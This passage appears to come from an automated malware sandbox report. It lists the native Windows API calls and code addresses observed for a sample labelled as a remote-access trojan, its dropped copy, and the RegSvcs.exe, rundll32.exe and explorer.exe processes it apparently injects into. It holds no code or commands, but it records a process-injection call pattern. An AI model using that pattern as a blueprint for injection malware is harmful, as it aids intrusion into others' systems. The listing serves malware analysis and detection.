Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282D00 NtSetInformationFile, 13_2_01282D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282DB0 NtEnumerateKey, 13_2_01282DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282C00 NtQueryInformationProcess, 13_2_01282C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282C60 NtCreateKey, 13_2_01282C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282CF0 NtOpenProcess, 13_2_01282CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282CC0 NtQueryVirtualMemory, 13_2_01282CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282F60 NtCreateProcessEx, 13_2_01282F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282FA0 NtQuerySection, 13_2_01282FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282E30 NtWriteVirtualMemory, 13_2_01282E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01282EE0 NtQueueApcThread, 13_2_01282EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01283010 NtOpenDirectoryObject, 13_2_01283010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01283090 NtSetValueKey, 13_2_01283090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012835C0 NtCreateMutant, 13_2_012835C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012839B0 NtGetContextThread, 13_2_012839B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01283D10 NtOpenProcessToken, 13_2_01283D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01283D70 NtOpenThread, 13_2_01283D70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00725CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError, 15_2_00725CF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_007240B1 NtQuerySystemInformation, 15_2_007240B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00725D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose, 15_2_00725D6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00724136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess, 15_2_00724136
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82CA0 NtQueryInformationToken,LdrInitializeThunk, 15_2_04C82CA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82C60 NtCreateKey,LdrInitializeThunk, 15_2_04C82C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82C70 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_04C82C70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82DD0 NtDelayExecution,LdrInitializeThunk, 15_2_04C82DD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82DF0 NtQuerySystemInformation,LdrInitializeThunk, 15_2_04C82DF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82D10 NtMapViewOfSection,LdrInitializeThunk, 15_2_04C82D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_04C82EA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82FE0 NtCreateFile,LdrInitializeThunk, 15_2_04C82FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82F30 NtCreateSection,LdrInitializeThunk, 15_2_04C82F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82AD0 NtReadFile,LdrInitializeThunk, 15_2_04C82AD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82BE0 NtQueryValueKey,LdrInitializeThunk, 15_2_04C82BE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_04C82BF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82B60 NtClose,LdrInitializeThunk, 15_2_04C82B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C835C0 NtCreateMutant,LdrInitializeThunk, 15_2_04C835C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C84650 NtSuspendThread, 15_2_04C84650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C84340 NtSetContextThread, 15_2_04C84340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82CC0 NtQueryVirtualMemory, 15_2_04C82CC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82CF0 NtOpenProcess, 15_2_04C82CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82C00 NtQueryInformationProcess, 15_2_04C82C00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82DB0 NtEnumerateKey, 15_2_04C82DB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82D00 NtSetInformationFile, 15_2_04C82D00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82D30 NtUnmapViewOfSection, 15_2_04C82D30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82EE0 NtQueueApcThread, 15_2_04C82EE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82E80 NtReadVirtualMemory, 15_2_04C82E80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82E30 NtWriteVirtualMemory, 15_2_04C82E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82F90 NtProtectVirtualMemory, 15_2_04C82F90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82FA0 NtQuerySection, 15_2_04C82FA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82FB0 NtResumeThread, 15_2_04C82FB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82F60 NtCreateProcessEx, 15_2_04C82F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82AF0 NtWriteFile, 15_2_04C82AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82AB0 NtWaitForSingleObject, 15_2_04C82AB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82B80 NtQueryInformationFile, 15_2_04C82B80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C82BA0 NtEnumerateValueKey, 15_2_04C82BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C83090 NtSetValueKey, 15_2_04C83090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C83010 NtOpenDirectoryObject, 15_2_04C83010
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C83D70 NtOpenThread, 15_2_04C83D70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C83D10 NtOpenProcessToken, 15_2_04C83D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04C839B0 NtGetContextThread, 15_2_04C839B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B6A370 NtCreateFile, 15_2_02B6A370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B6A4A0 NtClose, 15_2_02B6A4A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B6A420 NtReadFile, 15_2_02B6A420
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B6A550 NtAllocateVirtualMemory, 15_2_02B6A550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B6A49A NtClose, 15_2_02B6A49A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_02B6A41C NtReadFile, 15_2_02B6A41C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AAA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, 15_2_04AAA036
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AA9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 15_2_04AA9BAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AAA042 NtQueryInformationProcess, 15_2_04AAA042
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04AA9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 15_2_04AA9BB2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_02B6D5DC 0_2_02B6D5DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_07309668 0_2_07309668
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_07309658 0_2_07309658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_07300400 0_2_07300400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_073003F0 0_2_073003F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_07307E60 0_2_07307E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_07309ED8 0_2_07309ED8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_07307A28 0_2_07307A28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_07309AA0 0_2_07309AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_07309A90 0_2_07309A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_0BEF1118 0_2_0BEF1118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130100 7_2_01130100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01186000 7_2_01186000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114E3F0 7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011C02C0 7_2_011C02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140535 7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011965B2 7_2_011965B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011965D0 7_2_011965D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01164750 7_2_01164750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115C6E0 7_2_0115C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01156962 7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114A840 7_2_0114A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01178890 7_2_01178890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011268F1 7_2_011268F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011328F0 7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E8F0 7_2_0116E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142A45 7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114AD00 7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114ED7A 7_2_0114ED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01158DBF 7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01148DC0 7_2_01148DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140C00 7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130CF2 7_2_01130CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01160F30 7_2_01160F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01182F28 7_2_01182F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4F40 7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BEFA0 7_2_011BEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01132FC8 7_2_01132FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140E59 7_2_01140E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01152ED9 7_2_01152ED9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112F172 7_2_0112F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0117516C 7_2_0117516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114B1B0 7_2_0114B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011433F3 7_2_011433F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011452A0 7_2_011452A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115D2F0 7_2_0115D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01143497 7_2_01143497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011874E0 7_2_011874E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114B730 7_2_0114B730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01149950 7_2_01149950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115B950 7_2_0115B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01131979 7_2_01131979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011459DA 7_2_011459DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AD800 7_2_011AD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011438E0 7_2_011438E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115FB80 7_2_0115FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B5BF0 7_2_011B5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0117DBF9 7_2_0117DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B3A6C 7_2_011B3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01143D40 7_2_01143D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115FDC0 7_2_0115FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B9C32 7_2_011B9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01159C20 7_2_01159C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01141F92 7_2_01141F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01149EB0 7_2_01149EB0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_051DD5DC 8_2_051DD5DC
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_07309668 8_2_07309668
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_07309658 8_2_07309658
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_07300400 8_2_07300400
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_073003F0 8_2_073003F0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_073003C8 8_2_073003C8
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_07307E60 8_2_07307E60
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_07309ED8 8_2_07309ED8
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_07309AA0 8_2_07309AA0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_07309A90 8_2_07309A90
Source: C:\Windows\explorer.exe Code function: 9_2_0E396232 9_2_0E396232
Source: C:\Windows\explorer.exe Code function: 9_2_0E395036 9_2_0E395036
Source: C:\Windows\explorer.exe Code function: 9_2_0E38C082 9_2_0E38C082
Source: C:\Windows\explorer.exe Code function: 9_2_0E390B30 9_2_0E390B30
Source: C:\Windows\explorer.exe Code function: 9_2_0E390B32 9_2_0E390B32
Source: C:\Windows\explorer.exe Code function: 9_2_0E393912 9_2_0E393912
Source: C:\Windows\explorer.exe Code function: 9_2_0E38DD02 9_2_0E38DD02
Source: C:\Windows\explorer.exe Code function: 9_2_0E3995CD 9_2_0E3995CD
Source: C:\Windows\explorer.exe Code function: 9_2_104F8036 9_2_104F8036
Source: C:\Windows\explorer.exe Code function: 9_2_104EF082 9_2_104EF082
Source: C:\Windows\explorer.exe Code function: 9_2_104F0D02 9_2_104F0D02
Source: C:\Windows\explorer.exe Code function: 9_2_104F6912 9_2_104F6912
Source: C:\Windows\explorer.exe Code function: 9_2_104FC5CD 9_2_104FC5CD
Source: C:\Windows\explorer.exe Code function: 9_2_104F9232 9_2_104F9232
Source: C:\Windows\explorer.exe Code function: 9_2_104F3B32 9_2_104F3B32
Source: C:\Windows\explorer.exe Code function: 9_2_104F3B30 9_2_104F3B30
Source: C:\Windows\explorer.exe Code function: 9_2_1063C036 9_2_1063C036
Source: C:\Windows\explorer.exe Code function: 9_2_10633082 9_2_10633082
Source: C:\Windows\explorer.exe Code function: 9_2_10634D02 9_2_10634D02
Source: C:\Windows\explorer.exe Code function: 9_2_1063A912 9_2_1063A912
Source: C:\Windows\explorer.exe Code function: 9_2_106405CD 9_2_106405CD
Source: C:\Windows\explorer.exe Code function: 9_2_1063D232 9_2_1063D232
Source: C:\Windows\explorer.exe Code function: 9_2_10637B32 9_2_10637B32
Source: C:\Windows\explorer.exe Code function: 9_2_10637B30 9_2_10637B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00401026 13_2_00401026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00401030 13_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041EB5E 13_2_0041EB5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041E53C 13_2_0041E53C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00402D89 13_2_00402D89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00402D90 13_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041DDB4 13_2_0041DDB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00409E60 13_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041DF38 13_2_0041DF38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041D7FE 13_2_0041D7FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00402FB0 13_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01240100 13_2_01240100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012EA118 13_2_012EA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012D8158 13_2_012D8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_013041A2 13_2_013041A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_013101AA 13_2_013101AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_013081CC 13_2_013081CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012E2000 13_2_012E2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130A352 13_2_0130A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0125E3F0 13_2_0125E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_013103E6 13_2_013103E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012F0274 13_2_012F0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012D02C0 13_2_012D02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01250535 13_2_01250535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01310591 13_2_01310591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012F4420 13_2_012F4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01302446 13_2_01302446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012FE4F6 13_2_012FE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01250770 13_2_01250770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01274750 13_2_01274750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0124C7C0 13_2_0124C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0126C6E0 13_2_0126C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01266962 13_2_01266962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012529A0 13_2_012529A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0131A9A6 13_2_0131A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01252840 13_2_01252840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0125A840 13_2_0125A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012368B8 13_2_012368B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0127E8F0 13_2_0127E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130AB40 13_2_0130AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01306BD7 13_2_01306BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0124EA80 13_2_0124EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0125AD00 13_2_0125AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012ECD1F 13_2_012ECD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01268DBF 13_2_01268DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0124ADE0 13_2_0124ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01250C00 13_2_01250C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012F0CB5 13_2_012F0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01240CF2 13_2_01240CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01292F28 13_2_01292F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01270F30 13_2_01270F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012F2F30 13_2_012F2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012C4F40 13_2_012C4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012CEFA0 13_2_012CEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0125CFE0 13_2_0125CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01242FC8 13_2_01242FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130EE26 13_2_0130EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01250E59 13_2_01250E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130CE93 13_2_0130CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_01262E90 13_2_01262E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130EEDB 13_2_0130EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0128516C 13_2_0128516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0123F172 13_2_0123F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0131B16B 13_2_0131B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0125B1B0 13_2_0125B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0130F0E0 13_2_0130F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_013070E9 13_2_013070E9
